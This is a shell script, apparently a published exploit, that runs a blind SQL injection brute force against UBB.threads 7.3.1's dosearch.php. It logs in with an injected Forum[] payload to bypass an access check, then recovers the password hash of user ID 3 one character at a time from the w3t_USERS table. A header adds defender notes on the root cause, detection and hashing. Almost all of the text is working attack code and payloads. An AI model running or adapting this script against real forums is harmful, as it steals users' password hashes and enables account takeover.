#!/bin/sh
#
# UBB 7.3.1 dosearch.php blind SQL injection brute force attack
#
# What the script does, as written: it logs in to a UBB.threads install,
# then issues one search request per candidate character, recovering the
# USER_PASSWORD column of w3t_USERS for USER_ID 3 one position at a time.
# The only oracle is whether the returned search page contains the string
# "There are no results".
#
# NOTE(review): arrays, `+=` and the C-style `for` below are bash features
# used under a `#!/bin/sh` shebang; a non-bash /bin/sh will not parse them.
#
# Defender notes:
#   - Root cause: the `Forum[]` search parameter reaches SQL as text.  The
#     fix is a parameterized query (or a whitelist of known forum ids), not
#     filtering of the "no results" message, which is only the side channel.
#   - Detection: one session issuing many `ubb=dosearch` requests that differ
#     only in a growing prefix inside `Forum[]`, with `'))`, `LIKE` and `/*`
#     in the value, is the visible pattern.  No User-Agent override is passed
#     to wget here, so the client string is wget's default.
#   - A 16-symbol uppercase-hex alphabet over 32 positions compared with
#     `UPPER(USER_PASSWORD) LIKE '<hex>%'` is consistent with an unsalted hex
#     digest (presumably MD5 — nothing in the script confirms this).  Salted,
#     slow password hashing limits what a leaked column is worth.
#

# candidate alphabet: uppercase hex digits (the query upper-cases the column)
hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9)
# target entry point; host redacted by the author
main='http://[removed]/ubbthreads/ubbthreads.php'
# login form body; credentials redacted.  The `from=` field carries a
# URL-encoded `Forum[]` payload — see the INIT comment below for its purpose.
login='ubb=start_page&Loginname=[removed]&Loginpass=[removed]&firstlogin=1&from=http%3A%2F%2F[removed]%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&buttlogin=Log+In'
# search request the payload is appended to
base="$main?ubb=dosearch&fromsearch=1&Words=body"
# current payload.  Only the LIKE prefix is mutated below: each `_` stands
# for a position already resolved, the trailing letter is the candidate under
# test for the current position.
inject="&Forum[]=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*"
# recovered characters, in order
hash=()

#######################################
# Rewrite the LIKE pattern so the candidate character follows the already-
# resolved `_` wildcards (`\1`), replacing whatever candidate was there.
# Arguments: $1 - current payload, $2 - candidate character
# Outputs:   the new payload on stdout
#######################################
replace(){
  echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/"
}

#######################################
# Advance to the next position: keep the existing `_` wildcards, add one
# more, then put $2 in as the placeholder candidate.  The character just
# resolved is therefore not kept in the query, only in `hash`.
# Arguments: $1 - current payload, $2 - placeholder character
# Outputs:   the new payload on stdout
#######################################
push(){
  echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/"
}

#######################################
# Try every character in `hex` at the current position and stop at the
# first one whose search page lacks "There are no results", appending it
# to `hash`.  If no candidate matches, returns with `hash` unchanged.
# Globals:   hex, inject, base (read); hash (written)
# Outputs:   fetched page in ./ubb (the matching page is left behind, since
#            the return precedes the rm), cookies in ./cookies.txt
#######################################
brute(){
  for char in ${hex[*]}; do
    #replace string
    inj=`replace "$inject" $char`
    #inject
    wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt "$base$inj"
    #if match then return characters to hash array
    # (empty grep output == the page had results == the LIKE prefix matched)
    if [ -z `cat ubb | grep "There are no results"` ]; then
      hash+=($char)
      return
    fi
    rm ubb
  done
}

# INIT
#get PHPSESSID cookie
wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main
#login & get UBB cookies & inject SQL to bypass dosearch.inc.php access restriction
wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main

#blind SQL injection brute force attack
# one position per iteration, 32 positions in total
for ((i=0; i<32;i++)); do
  brute
  # move to the next position; "R" is a placeholder the next brute overwrites
  inject=`push "$inject" "R"`
done

#clean
rm cookies.txt

#print the hash
# all recovered characters concatenated, no separator and no trailing newline
printf "%s" "${hash[@]}" >> hash.txt